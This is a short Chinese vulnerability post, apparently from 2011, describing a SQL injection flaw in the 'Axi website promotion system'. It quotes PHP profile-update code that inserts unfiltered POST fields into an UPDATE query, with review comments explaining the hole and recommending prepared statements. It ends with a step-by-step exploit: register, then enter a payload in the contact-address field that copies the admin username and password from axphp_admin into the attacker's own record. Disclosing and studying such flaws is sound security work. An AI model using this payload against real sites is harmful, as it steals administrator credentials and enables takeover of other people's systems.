阿西网站推广系统注入漏洞

作者:hack1990 时间:11-10-31 阅读数:506人阅读
POST数据未经任何过滤,直接拼接进SQL语句:
// Excerpt of the user-profile update code quoted by the article.
// The backslashes in front of the quotes are not valid PHP in this position;
// presumably they were added when the page was stored or extracted, so read
// \" as " and \' as '.
// NOTE(review): the closing brace of this if-block is not part of the excerpt.
if($post==\"post\") 
{
// Five profile fields are copied straight from the request body. No escaping,
// type check or length limit is applied before they are used below.
$dizhi=$_POST[\'dizhi\'];
$youbian = $_POST[\'youbian\'];
$qq = $_POST[\'qq\'];
$dianhua = $_POST[\'dianhua\'];
$shenfenzheng = $_POST[\'shenfenzheng\'];
// Injection point: every value is interpolated inside a single-quoted SQL
// literal, so a quote character in any field ends the literal and the rest of
// that field is parsed as SQL. The effect is therefore not limited to the
// caller's own row of axphp_user.
// Fix: do not build the statement as a string; bind the five values (and the
// username) as parameters of a prepared statement (PDO or mysqli).
// $user is assigned outside this excerpt -- TODO confirm it is taken from the
// server-side session and not from the request.
$infosql = \"update axphp_user set dizhi=\'$dizhi\',youbian=\'$youbian\',qq=\'$qq\',dianhua=\'$dianhua\',shenfenzheng=\'$shenfenzheng\' where username=\'$user\'\";
// $config is passed as the connection argument of mysql_query(). The mysql_*
// extension has no prepared statements and was removed in PHP 7.0, so the fix
// also means moving this code to PDO or mysqli.
// The excerpt does not show $upok being checked.
$upok = mysql_query($infosql,$config);
mysql_close($config);
 
注册用户-->修改联系地址处-->填入
1\',dizhi=(select concat(adminname,0x7C,adminpass) from axphp_admin)#
